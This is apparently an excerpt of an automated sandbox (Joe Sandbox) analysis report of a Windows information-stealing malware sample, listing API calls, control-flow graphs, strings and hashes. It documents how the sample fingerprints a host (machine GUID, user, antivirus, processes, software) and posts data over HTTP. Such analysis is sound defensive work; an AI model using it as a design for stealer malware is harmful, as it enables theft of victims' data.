                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00926639
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00926647
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00926655
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00926662
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00926677
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00926685
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 009266E2
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 009266ED
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 009266F9
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926705
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926200
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                              • String ID: "$"$"$------$------$------$------$65158feadb3cebfa5c9a9e36f0d461fe$build_id$mode
                                                                                                                                                                                                              • API String ID: 3702379033-3253832395
                                                                                                                                                                                                              • Opcode ID: 7dadb0343927c6d48f73a3513c20f9acec94af7328d418a4804b9976d64da2c9
                                                                                                                                                                                                              • Instruction ID: ae7c213f3aedfb07a9787b89b2596f0f3ecd872ee613e6c9e1633f9285b5a4a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dadb0343927c6d48f73a3513c20f9acec94af7328d418a4804b9976d64da2c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0229E3191016D9BCF21EB61DD56BCCB774AF88704F0185E2A64E77126DA70AFCA8F90
                                                                                                                                                                                                              Function 00933BC6 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 674stringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 818 933bc6-9345e5 call 9304bc call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930c95 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9315a9 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 931659 call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930977 call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 GetCurrentProcessId call 93221f call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930b05 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9317dc call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93196c call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930c5a call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930c28 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 931538 call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930db0 call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930c95 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930d03 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930f26 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930fdc call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 930f8f call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9310ee call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 931167 call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93147a call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9311d8 call 93059c call 930562 call 922920 * 2 call 9311d8 call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 921cfd lstrlenA call 9304bc call 937023 call 922920 * 2 call 921cde
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00930C95: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,009565B6,?,?,?), ref: 00930CAD
                                                                                                                                                                                                                • Part of subcall function 00930C95: HeapAlloc.KERNEL32(00000000), ref: 00930CB4
                                                                                                                                                                                                                • Part of subcall function 00930C95: GetLocalTime.KERNEL32(?), ref: 00930CC0
                                                                                                                                                                                                                • Part of subcall function 00930C95: wsprintfA.USER32 ref: 00930CEB
                                                                                                                                                                                                                • Part of subcall function 009315A9: _memset.LIBCMT ref: 009315DC
                                                                                                                                                                                                                • Part of subcall function 009315A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 009315FB
                                                                                                                                                                                                                • Part of subcall function 009315A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00931620
                                                                                                                                                                                                                • Part of subcall function 009315A9: RegCloseKey.ADVAPI32(?,?,?,?), ref: 0093162C
                                                                                                                                                                                                                • Part of subcall function 009315A9: CharToOemA.USER32(?,?), ref: 00931640
                                                                                                                                                                                                                • Part of subcall function 00931659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00931674
                                                                                                                                                                                                                • Part of subcall function 00931659: _memset.LIBCMT ref: 009316A3
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 009316CB
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00956ED4,?,?,?,?,?), ref: 009316E8
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930977: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 009309AA
                                                                                                                                                                                                                • Part of subcall function 00930977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009309EA
                                                                                                                                                                                                                • Part of subcall function 00930977: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00930A3F
                                                                                                                                                                                                                • Part of subcall function 00930977: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00930A46
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(Path: ,00956884,HWID: ,00956878,GUID: ,0095686C,00000000,MachineID: ,0095685C,00000000,Date: ,00956850,0095684C,11.1,Version: ,009565B6), ref: 00933E1B
                                                                                                                                                                                                                • Part of subcall function 0093221F: OpenProcess.KERNEL32(00000410,00000000,00933E2A,00000000,?), ref: 00932241
                                                                                                                                                                                                                • Part of subcall function 0093221F: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0093225C
                                                                                                                                                                                                                • Part of subcall function 0093221F: CloseHandle.KERNEL32(00000000), ref: 00932263
                                                                                                                                                                                                                • Part of subcall function 00930B05: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B19
                                                                                                                                                                                                                • Part of subcall function 00930B05: HeapAlloc.KERNEL32(00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B20
                                                                                                                                                                                                                • Part of subcall function 009317DC: __EH_prolog3_catch_GS.LIBCMT ref: 009317E3
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00933F39,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 009317F4
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931805
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 0093181F
                                                                                                                                                                                                                • Part of subcall function 009317DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00931855
                                                                                                                                                                                                                • Part of subcall function 009317DC: VariantInit.OLEAUT32(?), ref: 009318B0
                                                                                                                                                                                                                • Part of subcall function 0093196C: __EH_prolog3_catch.LIBCMT ref: 00931973
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoInitializeEx.OLE32(00000000,00000000,00000030,00933FA7,?,AV: ,009568CC,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 00931982
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931993
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 009319AD
                                                                                                                                                                                                                • Part of subcall function 0093196C: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009319E3
                                                                                                                                                                                                                • Part of subcall function 0093196C: VariantInit.OLEAUT32(?), ref: 00931A32
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00921385), ref: 00930C66
                                                                                                                                                                                                                • Part of subcall function 00930C5A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00921385), ref: 00930C6D
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetComputerNameA.KERNEL32(00000000,00921385), ref: 00930C81
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009213B9), ref: 00930C34
                                                                                                                                                                                                                • Part of subcall function 00930C28: HeapAlloc.KERNEL32(00000000,?,?,?,009213B9), ref: 00930C3B
                                                                                                                                                                                                                • Part of subcall function 00930C28: GetUserNameA.ADVAPI32(00000000,009213B9), ref: 00930C4F
                                                                                                                                                                                                                • Part of subcall function 00931538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0093154A
                                                                                                                                                                                                                • Part of subcall function 00931538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00931555
                                                                                                                                                                                                                • Part of subcall function 00931538: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00931560
                                                                                                                                                                                                                • Part of subcall function 00931538: ReleaseDC.USER32(00000000,00000000), ref: 0093156B
                                                                                                                                                                                                                • Part of subcall function 00931538: GetProcessHeap.KERNEL32(00000000,00000104,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC), ref: 00931577
                                                                                                                                                                                                                • Part of subcall function 00931538: HeapAlloc.KERNEL32(00000000,?,?,009340D8,?,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 0093157E
                                                                                                                                                                                                                • Part of subcall function 00931538: wsprintfA.USER32 ref: 00931590
                                                                                                                                                                                                                • Part of subcall function 00930DB0: GetKeyboardLayoutList.USER32(00000000,00000000,0095670A,?,?), ref: 00930DE1
                                                                                                                                                                                                                • Part of subcall function 00930DB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00930DEF
                                                                                                                                                                                                                • Part of subcall function 00930DB0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00930DFD
                                                                                                                                                                                                                • Part of subcall function 00930DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00930E2C
                                                                                                                                                                                                                • Part of subcall function 00930DB0: LocalFree.KERNEL32(00000000), ref: 00930ED4
                                                                                                                                                                                                                • Part of subcall function 00930D03: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00930D1E
                                                                                                                                                                                                                • Part of subcall function 00930D03: HeapAlloc.KERNEL32(00000000), ref: 00930D25
                                                                                                                                                                                                                • Part of subcall function 00930D03: GetTimeZoneInformation.KERNEL32(?), ref: 00930D34
                                                                                                                                                                                                                • Part of subcall function 00930D03: wsprintfA.USER32 ref: 00930D52
                                                                                                                                                                                                                • Part of subcall function 00930F26: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934), ref: 00930F3A
                                                                                                                                                                                                                • Part of subcall function 00930F26: HeapAlloc.KERNEL32(00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F41
                                                                                                                                                                                                                • Part of subcall function 00930F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ), ref: 00930F5F
                                                                                                                                                                                                                • Part of subcall function 00930F26: RegQueryValueExA.KERNEL32(00956890,00000000,00000000,00000000,000000FF,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000), ref: 00930F7B
                                                                                                                                                                                                                • Part of subcall function 00930F26: RegCloseKey.ADVAPI32(00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F84
                                                                                                                                                                                                                • Part of subcall function 00930FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00931052
                                                                                                                                                                                                                • Part of subcall function 00930FDC: wsprintfA.USER32 ref: 009310B0
                                                                                                                                                                                                                • Part of subcall function 00930F8F: GetSystemInfo.KERNEL32(?), ref: 00930FA9
                                                                                                                                                                                                                • Part of subcall function 00930F8F: wsprintfA.USER32 ref: 00930FC1
                                                                                                                                                                                                                • Part of subcall function 009310EE: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00956918,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000,Computer Name: ,009568D8,AV: ,009568CC,Install Date: ), ref: 00931106
                                                                                                                                                                                                                • Part of subcall function 009310EE: HeapAlloc.KERNEL32(00000000), ref: 0093110D
                                                                                                                                                                                                                • Part of subcall function 009310EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00931129
                                                                                                                                                                                                                • Part of subcall function 009310EE: wsprintfA.USER32 ref: 0093114F
                                                                                                                                                                                                                • Part of subcall function 00931167: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 009311BE
                                                                                                                                                                                                                • Part of subcall function 0093147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0095670F,?,?), ref: 009314A9
                                                                                                                                                                                                                • Part of subcall function 0093147A: Process32First.KERNEL32(00000000,00000128), ref: 009314B9
                                                                                                                                                                                                                • Part of subcall function 0093147A: Process32Next.KERNEL32(00000000,00000128), ref: 00931517
                                                                                                                                                                                                                • Part of subcall function 0093147A: CloseHandle.KERNEL32(00000000), ref: 00931522
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0095670E,00000000,?,?), ref: 00931248
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00931285
                                                                                                                                                                                                                • Part of subcall function 009311D8: wsprintfA.USER32 ref: 009312B2
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 009312D1
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00931307
                                                                                                                                                                                                                • Part of subcall function 009311D8: lstrlenA.KERNEL32(?), ref: 0093131C
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00956E94), ref: 009313B1
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegCloseKey.ADVAPI32(?), ref: 0093141B
                                                                                                                                                                                                                • Part of subcall function 009311D8: RegCloseKey.ADVAPI32(?), ref: 00931447
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00956918,Display Resolution: ,009568FC,00000000,User Name: ,009568EC,00000000), ref: 009345A3
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                              • String ID: 11.1$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                              • API String ID: 3634126619-3666103263
                                                                                                                                                                                                              • Opcode ID: 92c4f559da60205cb5263ddc0260660f9beca2021d3b20da0878e0dd25035a92
                                                                                                                                                                                                              • Instruction ID: a40389817a53189dc15db50d46c82dd0866f734e6a32226272d50786fa18b7f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92c4f559da60205cb5263ddc0260660f9beca2021d3b20da0878e0dd25035a92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98525D36D5002EABCF01FBA1ED52ADDB774AF84704F518261B65177166DB30BE8A8F80
                                                                                                                                                                                                              Function 009387CF Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1419 9387cf-9387df call 938726 1422 9389d0-938a2d LoadLibraryA * 5 1419->1422 1423 9387e5-9389cb call 927d47 GetProcAddress * 20 1419->1423 1424 938a41-938a48 1422->1424 1425 938a2f-938a3c GetProcAddress 1422->1425 1423->1422 1427 938a73-938a7a 1424->1427 1428 938a4a-938a6e GetProcAddress * 2 1424->1428 1425->1424 1430 938a8e-938a95 1427->1430 1431 938a7c-938a89 GetProcAddress 1427->1431 1428->1427 1433 938a97-938aa4 GetProcAddress 1430->1433 1434 938aa9-938ab0 1430->1434 1431->1430 1433->1434 1435 938ab2-938ad6 GetProcAddress * 2 1434->1435 1436 938adb 1434->1436 1435->1436
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938810
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938827
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093883E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938855
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093886C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938883
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093889A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388B1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388C8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388DF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009388F6
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093890D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938924
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 0093893B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938952
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938969
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938980
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938997
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009389AE
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 009389C5
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 009389D6
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 009389E7
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 009389F8
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 00938A09
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,0093864E), ref: 00938A1A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75B30000,0093864E), ref: 00938A36
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(751E0000,0093864E), ref: 00938A51
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938A68
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76910000,0093864E), ref: 00938A83
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75670000,0093864E), ref: 00938A9E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77310000,0093864E), ref: 00938AB9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32 ref: 00938AD0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                              • Opcode ID: 5dccce7f95976b9383e2380b80e833f527105d4f21679f6da53cb65eb603e27a
                                                                                                                                                                                                              • Instruction ID: b2e0c1ffc9781e5785237c992f30286cb0fd71a6a72cdef5ee9a64f3d081bef3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dccce7f95976b9383e2380b80e833f527105d4f21679f6da53cb65eb603e27a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C071FCB5801212AFDB025FA0FC499253ABAFF0C34131295A5E92D9B2B1DF71C8D0EF59
                                                                                                                                                                                                              Function 009369F8 Relevance: 45.8, APIs: 10, Strings: 16, Instructions: 331sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
